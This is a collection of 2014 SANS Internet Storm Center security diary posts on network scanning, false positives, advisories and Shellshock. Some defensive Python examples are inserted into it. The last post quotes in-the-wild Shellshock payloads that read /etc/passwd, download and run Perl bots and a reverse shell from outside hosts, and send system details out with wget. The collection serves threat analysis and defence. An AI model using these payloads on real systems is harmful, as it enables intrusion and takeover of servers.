Alerts

ISC StormCast for Monday, October 6th 2014 http://isc.sans.edu/podcastdetail.html?id=4179, (Mon, Oct 6th)

Latest Alerts - Sun, 10/05/2014 - 17:49
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Detecting irregular programs and services installed in your network, (Sun, Oct 5th)

Latest Alerts - Sun, 10/05/2014 - 09:34

When the corporate network becomes a target, auditing for security policy compliance can be challenging if you don't have software that controls irregular use of administrator privileges: privileges that were granted legitimately but are then used to install unauthorized software, or to change configuration by installing services that could interrupt network service. Examples of such issues are additional DHCP servers (IPv4 and IPv6), Dropbox, Spotify or ARP scanning devices.

We can use nmap to detect all protocols that send broadcast packets and are supported by packetdecoders.lua:

  • Ether
    • ARP requests (IPv4)
    • CDP - Cisco Discovery Protocol
    • EIGRP - Cisco Enhanced Interior Gateway Routing Protocol
    • OSPF - Open Shortest Path First
  • UDP
    • DHCP
    • Netbios
    • SSDP
    • HSRP
    • DropBox
    • Logitech SqueezeBox Discovery
    • Multicast DNS/Bonjour/ZeroConf
    • Spotify

The following example shows how to use nmap with the broadcast-listener script. In its output we can see a device with Dropbox installed, a device sending ARP requests (a router in this case) and a device sending DHCPv6 requests:

You can run this script periodically to track common security issues in your network, just in case your IPS is missing something ;)
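As an added example (not part of the diary, and not nmap's packetdecoders.lua), the following Python shows what a broadcast listener has to do for one item on that list: decode a captured DHCP OFFER and flag the sending server if it is not on an allowlist, which is the rogue-DHCP-server case named above. The packet builder, the allowlist and the 10.0.0.0/24 addresses are constructed for the example.

```python
from ipaddress import IPv4Address

MAGIC_COOKIE = b"\x63\x82\x53\x63"   # marks the start of the DHCP option field
OPT_PAD, OPT_ROUTER, OPT_MSG_TYPE, OPT_SERVER_ID, OPT_END = 0, 3, 53, 54, 255
DHCPOFFER = 2

def parse_dhcp(payload):
    """Pull the fields a rogue-server check needs out of a raw BOOTP/DHCP payload."""
    if len(payload) < 240 or payload[236:240] != MAGIC_COOKIE:
        raise ValueError("not a DHCP packet")
    fields = {"op": payload[0],
              "yiaddr": str(IPv4Address(payload[16:20])),   # address being handed out
              "type": None, "server_id": None, "router": None}
    i = 240
    while i < len(payload):
        code = payload[i]
        if code == OPT_END:
            break
        if code == OPT_PAD:
            i += 1
            continue
        length = payload[i + 1]
        data = payload[i + 2:i + 2 + length]
        if code == OPT_MSG_TYPE:
            fields["type"] = data[0]
        elif code == OPT_SERVER_ID:
            fields["server_id"] = str(IPv4Address(data[:4]))
        elif code == OPT_ROUTER:
            fields["router"] = str(IPv4Address(data[:4]))   # first router only
        i += 2 + length
    return fields

def check_offer(payload, authorized_servers):
    """('ok'|'rogue', fields) for a DHCPOFFER; None for any other DHCP message."""
    fields = parse_dhcp(payload)
    if fields["type"] != DHCPOFFER:
        return None
    verdict = "ok" if fields["server_id"] in authorized_servers else "rogue"
    return verdict, fields

def build_offer(server_ip, yiaddr, router):
    """Constructed test packet (not captured traffic): a minimal DHCPOFFER."""
    hdr = bytearray(236)
    hdr[0], hdr[1], hdr[2] = 2, 1, 6                 # BOOTREPLY, Ethernet, hlen 6
    hdr[16:20] = IPv4Address(yiaddr).packed          # yiaddr
    hdr[20:24] = IPv4Address(server_ip).packed       # siaddr
    opts = (bytes([OPT_MSG_TYPE, 1, DHCPOFFER])
            + bytes([OPT_SERVER_ID, 4]) + IPv4Address(server_ip).packed
            + bytes([OPT_ROUTER, 4]) + IPv4Address(router).packed
            + bytes([OPT_END]))
    return bytes(hdr) + MAGIC_COOKIE + opts

if __name__ == "__main__":
    AUTHORIZED = {"10.0.0.1"}     # assumed allowlist of the site's real DHCP servers
    for offer in (build_offer("10.0.0.1", "10.0.0.50", "10.0.0.1"),
                  build_offer("10.0.0.77", "10.0.0.51", "10.0.0.77")):
        print(check_offer(offer, AUTHORIZED))
```

The same check applies unchanged to DHCPACK messages if you drop the message-type filter; for DHCPv6 the header and option encoding differ and need a separate decoder.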

Manuel Humberto Santander Pelaez
SANS Internet Storm Center - Handler
Twitter:@manuelsantander
Web:http://manuel.santander.name
e-mail: msantand at isc dot sans dot org


Testing for opened ports with firewalk technique, (Sat, Oct 4th)

Latest Alerts - Sun, 10/05/2014 - 09:33

There is an interesting way of learning what kind of filters are in place on the gateway in front of a specific host. It is called firewalk and it is based on IP TTL expiration. The algorithm goes as follows:

  • The entire route is determined using any of the available traceroute techniques.
  • A packet is sent with the TTL equal to the distance to the target.
  • If the packet times out, it is resent with the TTL equal to the distance to the target minus one.
  • If an ICMP type 11 code 0 (Time-to-Live exceeded) is received, the packet was forwarded, so the port is not blocked.
  • If no response is received, the port is blocked on the gateway.

Let's see this with a real example. Consider the following network diagram:

Firewalking happens with the following steps:

  1. Traceroute packets are sent with decreasing TTL to determine the gateways:


  2. An ICMP Time Exceeded message is received from a gateway for each of the TTL=2 and TTL=1 packets, which means there are two gateways between origin and destination and TTL=3 is the distance to the destination.

  3. Several packets are sent to the destination with TTL=3, varying the destination port. The sequence goes as follows: a first packet is sent with TTL=3. If a timeout occurs, a second packet is sent with TTL=1. If an ICMP type 11 code 0 (Time-to-live exceeded) is received, the gateway is forwarding the packet.

Let's see the first packet, to port 1 with TTL=3:

A timeout occurs, so the same packet is sent with TTL=2:

ICMP type 11 code 0 is sent by the gateway that routes to the destination host, which means the packet was forwarded and the port is open on the gateway:

How can we use this technique? Nmap has a firewalk script. For this example, the following command should be issued:

nmap --script=firewalk --traceroute 172.16.2.165
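The decision logic above, modelled in Python as an added example: it is not the nmap firewalk script and sends no packets. The network is an in-memory path of hops; the topology of two gateways in front of 172.16.2.165 and the 192.0.2.x gateway addresses are constructed to match the walk-through, and the rest is the diary's own algorithm.

```python
from dataclasses import dataclass, field

TRACE_PORT = 33434   # classic traceroute's first UDP port; assumed unfiltered here

@dataclass
class Hop:
    """One device on the path. Probes to blocked_ports are dropped silently."""
    addr: str
    blocked_ports: set = field(default_factory=set)

@dataclass
class Path:
    """Ordered gateways followed by the destination host as the last element."""
    hops: list

    def send(self, ttl, dport):
        """What the network answers to one probe: ('icmp11', gw) when the TTL
        expires at an intermediate hop, ('reply', host) when the packet reaches
        the destination, None when it is dropped (the sender sees a timeout)."""
        for n, hop in enumerate(self.hops, start=1):
            # Inbound filtering is applied before TTL expiry is handled, which is
            # what lets the TTL=distance-1 probe reveal the gateway's filter.
            if dport in hop.blocked_ports:
                return None
            if n == ttl:
                return ("reply", hop.addr) if n == len(self.hops) else ("icmp11", hop.addr)
        return None

def distance_to(path, max_ttl=30):
    """Traceroute phase: the first TTL for which the destination itself answers."""
    for ttl in range(1, max_ttl + 1):
        answer = path.send(ttl, TRACE_PORT)
        if answer and answer[0] == "reply":
            return ttl
    return None

def firewalk(path, ports, distance):
    """Classify each port as the diary describes: a probe at TTL=distance that
    times out is resent at TTL=distance-1; ICMP type 11 code 0 from the last
    gateway means it forwarded the packet, silence means the port is filtered."""
    verdicts = {}
    for port in ports:
        answer = path.send(distance, port)
        if answer and answer[0] == "reply":
            verdicts[port] = "forwarded"       # destination answered directly
            continue
        answer = path.send(distance - 1, port)
        if answer and answer[0] == "icmp11":
            verdicts[port] = "forwarded"       # gateway passed it, host stayed silent
        else:
            verdicts[port] = "filtered"        # no ICMP 11/0: dropped at the gateway
    return verdicts

# Constructed topology matching the diary: two gateways, then the host at distance 3.
PATH = Path([Hop("192.0.2.1"),
             Hop("192.0.2.2", blocked_ports={23}),        # last gateway filters telnet
             Hop("172.16.2.165", blocked_ports={1})])     # host firewall drops port 1

if __name__ == "__main__":
    d = distance_to(PATH)
    print("distance:", d, firewalk(PATH, [1, 23, 80], d))
```

A silent TTL=distance-1 probe is also what an ICMP rate limit on the gateway would produce, so "filtered" is an inference worth confirming by repeating the probe.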

Manuel Humberto Santander Pelaez
SANS Internet Storm Center - Handler
Twitter:@manuelsantander
Web:http://manuel.santander.name
e-mail: msantand at isc dot sans dot org


CSAM: The Power of Virustotal to Turn Harmless Binaries Malicious, (Fri, Oct 3rd)

Latest Alerts - Fri, 10/03/2014 - 10:47

We all know that anti-virus, the necessary evil of basic computer security, is no stranger to false positives. So no big surprise here when John writes that he ran into such a false positive during an incident response:

I was scanning a forensic drive image with clamav and scored a positive hit on a file.

Great. ClamAV, a free anti-virus product. Of course, we don't trust it. So John did what most of us would have done, and submitted the suspect binary to Virustotal:

Virustotal showed 14 out of other 50 AV vendors' products thought it was malware as well.

Ouch! 14 out of 50? Many actual malware samples I submit get a lower rate than that. Turns out the binary in question was desktop management software, "lunchwrapper.exe", and the AV tools picked up on its file-download component (the famous "generic downloader" signatures).

But you think this is bad? Listen to what happened next, according to John:

The scary part was that after I submitted the sample, other major AV vendors decided that the submitted sample was malicious and our endpoint software starting quarantining the program after the AV dats had updated.

After all, as my fellow developer can attest, too: the reason we allow people to use our applications is so that we don't have to do any testing ourselves.

(BTW: Virustotal/Google are doing great work, and I think it is a good thing that they are distributing samples. The problem is how AV vendors use this information.)

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn


ISC StormCast for Friday, October 3rd 2014 http://isc.sans.edu/podcastdetail.html?id=4177, (Fri, Oct 3rd)

Latest Alerts - Thu, 10/02/2014 - 16:13

Why is your Mac all for sudden using Bing as a search engine?, (Thu, Oct 2nd)

Latest Alerts - Thu, 10/02/2014 - 13:14

Even as a Mac user, you may have heard about Bing; at least you may have seen it demonstrated in commercials [1]. But if the default search engine on your Mac is all of a sudden switched to Bing, this may be due to another piece of legacy software that some Mac users may have a hard time living without: Microsoft's Internet Explorer. So why not just search ("google") to see if there is a version for OSX:

In short: I don't think this software does anything illegal. It clearly advertises what it does. If you feel otherwise, you can file a complaint with courts in Cyprus where the company is located.

[1] https://www.youtube.com/user/bing
[2] http://info.trovi.com/Privacy

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn


CSAM: My Storage Array SSHs Outbound!, (Thu, Oct 2nd)

Latest Alerts - Thu, 10/02/2014 - 06:29

Kudos to Matthew for paying attention to egress traffic. We keep emphasizing how important it is to make sure no systems talk "outbound" without permission. Just this last week, various Shellshock exploits did just that: turn devices into IRC clients, download additional tools via HTTP, or just report success via a simple ping.

So no surprise that Matthew wrote us: "... the first time I saw the storage array SSH to the internet I about fainted. ..."

I would be surprised too! And it turns out he isn't the only person who experienced this. Mark noted:

"Had the same freak moment when I saw it happen. The SAN happily communicating to an outside entity. Thought the company had been well and truly hosed."

Luckily, before going too far down the incident handling road, Matthew realized that this was a false positive. The storage array in question called "back home" to the vendor to report on its status. The purpose of this communication is to report failed disks or other critical events that may trigger a service call. Vendors will agree to turn off this feature, but then of course it is up to you to recognize faulty disks.

Got anything like that? Let us know (if possible with a log snippet, packet capture or other show-and-tell).

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn


Cyber Security Awareness Month 2014: Scary False Positives, (Thu, Oct 2nd)

Latest Alerts - Thu, 10/02/2014 - 05:57

To "celebrate" Cyber Security Awareness Month, we decided to focus on "scary false positives" during October. If you have any to share, please let us know. What we are looking for is preferably a log entry, or another "indicator", that led you to believe that your system was compromised but in the end turned out to be a false positive.

Please e-mail your stories to handlers-at-isc.sans.edu or use our Contact form.

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn


ISC StormCast for Thursday, October 2nd 2014 http://isc.sans.edu/podcastdetail.html?id=4173, (Thu, Oct 2nd)

Latest Alerts - Wed, 10/01/2014 - 16:41

Xen Security Advisory - XSA 108 - http://xenbits.xen.org/xsa/advisory-108.html, (Wed, Oct 1st)

Latest Alerts - Wed, 10/01/2014 - 15:04

Xen has issued an advisory and a related patch to address an issue that allows a "buggy or malicious HVM guest to crash the host or read data relating to other guests or the hypervisor itself."

Xen 4.1 and onward are vulnerable, but only on x86 systems; ARM systems are not vulnerable.

Applying the patch resolves this issue.

Russ McRee | @holisticinfosec


Security Onion news: Updated ShellShock detection scripts for Bro, (Wed, Oct 1st)

Latest Alerts - Wed, 10/01/2014 - 13:03

Per Security Onion's Doug Burks, Seth Hall has developed some comprehensive ShellShock detection scripts for Bro.
These scripts "detect successful exploitation of the Bash vulnerability with CVE-2014-6271 nicknamed "ShellShock" and are more comprehensive than most detections in that they're watching for behavior from the attacked host that might indicate successful compromise or actual vulnerability."
Seth has updated these scripts again today to "Add shellscripts as a post-exploit detection mechanism."
Doug has updated the securityonion-bro-scripts package to include these changes and has also updated the securityonion-web-page package to include some ELSA queries for "ShellShock Exploits" and "ShellShock Scanners".

This is great for current Security Onion users, and even better for readers who have not yet investigated and invested in Security Onion. Now's the time to become familiar and improve your situational awareness, particularly given the fact that it's National Cyber Security Awareness Month. :-)

Everything you need is available on Doug's blog: http://blog.securityonion.net/2014/10/new-securityonion-bro-scripts-and.html

Russ McRee | @holisticinfosec


VMware security advisory: VMSA-2014-0010 http://www.vmware.com/security/advisories/VMSA-2014-0010.html, (Wed, Oct 1st)

Latest Alerts - Tue, 09/30/2014 - 20:10

ISC StormCast for Wednesday, October 1st 2014 http://isc.sans.edu/podcastdetail.html?id=4171, (Wed, Oct 1st)

Latest Alerts - Tue, 09/30/2014 - 16:27

DerbyCon highlights, (Tue, Sep 30th)

Latest Alerts - Tue, 09/30/2014 - 15:59

I had the pleasure of attending DerbyCon 4.0 (Family Rootz) this past Friday and Saturday and can tell you that if you haven't already attended yourself, plan to do so next year. Aside from the smaller and more encompassing "family" feel, an intentional and protected approach strongly advocated for by @HackingDave and the great @DerbyCon team, you'll also be contributing to Hackers For Charity (HFC). For those of you who couldn't attend but are interested in some of the outstanding content, Adrian Crenshaw (@irongeek_adc) and his team always shoot video of each presentation. For DerbyCon 4.0 they've posted the videos to the Irongeek site here.  

There are so many great talks to choose from but I'll share a few that really resonated with me given current interest or focus areas:

Attacking Microsoft Kerberos: Kicking the Guard Dog of Hades - Tim Medin
Abusing Active Directory in Post-Exploitation – Carlos Perez
Ball and Chain (A New Paradigm in Stored Password Security) – Benjamin Donnelly and Tim Tomes
Third Party Code: FIX ALL THE THINGS – Kymberlee Price and Jake Kouns

You should also, in the simple name of humanity, watch Johnny Long's keynote, Hackers saving the world from the zombie apocalypse.

Great conference, great people, great presentations; take the time to watch as many of the videos as possible, and see if you can get a ticket next year when DerbyCon comes around again.

Russ McRee | @holisticinfosec



ISC threat level returned to green - ShellShock message traffic subsiding, recommend focus on patching and monitoring, (Tue, Sep 30th)

Latest Alerts - Tue, 09/30/2014 - 13:43

ISC StormCast for Tuesday, September 30th 2014 http://isc.sans.edu/podcastdetail.html?id=4169, (Tue, Sep 30th)

Latest Alerts - Mon, 09/29/2014 - 16:27

Apple Released Update to Fix Shellshock Vulnerability http://support.apple.com/kb/DL1769, (Mon, Sep 29th)

Latest Alerts - Mon, 09/29/2014 - 13:54

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn


Shellshock: Updated Webcast (Now 6 bash related CVEs!), (Mon, Sep 29th)

Latest Alerts - Mon, 09/29/2014 - 11:41

I just published an updated YouTube presentation (about 15 min in length) with some of the shell shock related news from the last couple days:

YouTube: https://www.youtube.com/watch?v=b2HKgkH4LrQ
PDF: https://isc.sans.edu/presentations/ShellShockV2.pdf
PPT: https://isc.sans.edu/presentations/ShellShockV2.pptx


As always, the material is published "creative commons / share alike", so feel free to use the slides.


---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn


Shellshock: A Collection of Exploits seen in the wild, (Mon, Sep 29th)

Latest Alerts - Mon, 09/29/2014 - 07:05

Ever since the shellshock vulnerability was announced, we have seen a large number of scans probing for it. Here is a quick review of the exploits that our honeypots and live servers have seen so far:

1 - Simple "vulnerability checks" that used custom User-Agents:

() { 0v3r1d3;};echo \x22Content-type: text/plain\x22; echo; uname -a;
() { :;}; echo 'Shellshock: Vulnerable'
() { :;};echo content-type:text/plain;echo;echo [random string];echo;exit
() { :;}; /bin/bash -c "echo testing[number]"; /bin/uname -a\x0a\x0a
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36 \x22() { test;};echo \x5C\x22Co\
ntent-type: text/plain\x5C\x22; echo; echo; /bin/cat /etc/passwd\x22 http://[IP address]/cgi-bin/test.cgi

This one is a bit different. It includes the tested URL as the User-Agent. But it doesn't escape special characters correctly, so this exploit would fail in this case. The page at 89.248.172.139 appears to only return an "empty page" message.

) { :;}; /bin/bash -c \x22wget -U BashNslash.http://isc.sans.edu/diary/Update+on+CVE-2014-6271:+Vulnerability+in+bash+(shellshock)/18707 89.248.172.139\x22

 

2 - Bots using the shellshock vulnerability:

This one installs a simple Perl bot, which connects to irc.hacker-newbie.org port 6667, channel #bug.

() { :; }; \x22exec('/bin/bash -c cd /tmp ; curl -O http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; lwp-download http://xr0b\
0tx.com/shock/cgi ; perl /tmp/cgi ;rm -rf /tmp/cgi ; wget http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; curl -O http://xr0\
b0tx.com/shock/xrt ; perl /tmp/xrt ; rm -rf /tmp/xrt ; lwp-download http://xr0b0tx.com/shock/xrt ; perl /tmp/xrt ;rm -rf /tmp/xrt ; wget http\
://xr0b0tx.com/shock/xrt ; perl /tmp/xrt ; rm -rf /tmp/xrt')\x22;" "() { :; }; \x22exec('/bin/bash -c cd /tmp ; curl -O http://xr0b0tx.com/sh\
ock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; lwp-download http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ;rm -rf /tmp/cgi ; wget http://xr0b0tx.\
com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; curl -O http://xr0b0tx.com/shock/xrt ; perl /tmp/xrt ; rm -rf /tmp/xrt ; lwp-download http:\
//xr0b0tx.com/shock/xrt ; perl /tmp/xrt ;rm -rf /tmp/xrt ; wget http://xr0b0tx.com/shock/xrt ; perl /tmp/xrt ; rm -rf /tmp/xrt')\x22;

3 - Vulnerability checks using multiple headers:

GET / HTTP/1.0
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; fr; rv:1.9.0.3) Gecko/2008092414 Firefox/3.0.3
Accept: */*
Cookie: () { :; }; ping -c 3 [ipaddress]
Host: () { :; }; ping -c 3 [ipaddress]
Referer: () { :; }; ping -c 3 [ipaddress]

4 - Using multiple headers to install a Perl reverse shell (the shell connects to 46.246.34.82 port 1992 in this case)

GET / HTTP/1.1
Host: [ip address]
Cookie:() { :; }; /usr/bin/curl -o /tmp/auth.pl http://sbd.awardspace.com/auth; /usr/bin/perl /tmp/auth.pl
Referer:() { :; }; /usr/bin/curl -o /tmp/auth.pl http://sbd.awardspace.com/auth; /usr/bin/perl /tmp/auth.pl

5 - Using the User-Agent to report system parameters back (the IP address is currently not responding)

GET / HTTP/1.0
Accept: */*\
aUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:27.3) Gecko/20130101 Firefox/27.3
Host: () { :; }; wget -qO- 82.221.99.235 -U="$(uname -a)"
Cookie: () { :; }; wget -qO- 82.221.99.235 -U="$(uname -a)" 

6 - User-Agent used to install perl box

GET / HTTP/1.0
Host: [ip address]
User-Agent: () { :;}; /bin/bash -c "wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*
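As a defender-side complement to the collection above, here is an added Python example (not from the diary) that scans the headers of a logged HTTP request for the `() { ... };` prefix these payloads share and labels what follows it using the groupings of the list; the sample request and the 192.0.2.10 / example.invalid addresses are constructed.

```python
import re

# Bash function-definition prefix that triggers CVE-2014-6271 once a CGI handler
# exports the header value into the environment; the injected command follows "};".
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;(?P<cmd>.*)")

FETCH_TOOLS = ("wget", "curl", "lwp-download")

def classify(cmd):
    """Coarse label for the injected command, following the groupings above."""
    lowered = cmd.lower()
    if any(tool in lowered for tool in FETCH_TOOLS):
        return "outbound-fetch"        # download-and-run or report-back over HTTP
    if re.search(r"\bping\b", lowered):
        return "icmp-callback"         # item 3: success signalled with ICMP echo
    return "probe"                     # item 1: echo/uname style vulnerability check

def scan_request(raw):
    """Return (header, label, command) for every header that carries the prefix."""
    hits = []
    for line in raw.splitlines():
        name, sep, value = line.partition(":")
        if not sep or " " in name.strip():      # request line or blank line: no header
            continue
        match = SHELLSHOCK_RE.search(value)
        if match:
            cmd = match.group("cmd").strip()
            hits.append((name.strip(), classify(cmd), cmd))
    return hits

# Constructed request in the style of items 3 and 4 above; addresses are placeholders.
SAMPLE = """GET / HTTP/1.0
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; fr; rv:1.9.0.3) Gecko/2008092414 Firefox/3.0.3
Accept: */*
Cookie: () { :; }; ping -c 3 192.0.2.10
Host: () { :; }; ping -c 3 192.0.2.10
Referer: () { :; }; /usr/bin/curl -o /tmp/auth.pl http://example.invalid/auth; /usr/bin/perl /tmp/auth.pl
"""

if __name__ == "__main__":
    for hit in scan_request(SAMPLE):
        print(hit)
```

Run it over access or proxy logs that keep the full header set; a match on any header, not just User-Agent, is the signal, and the label tells you whether to look for the follow-on outbound connection.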

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn
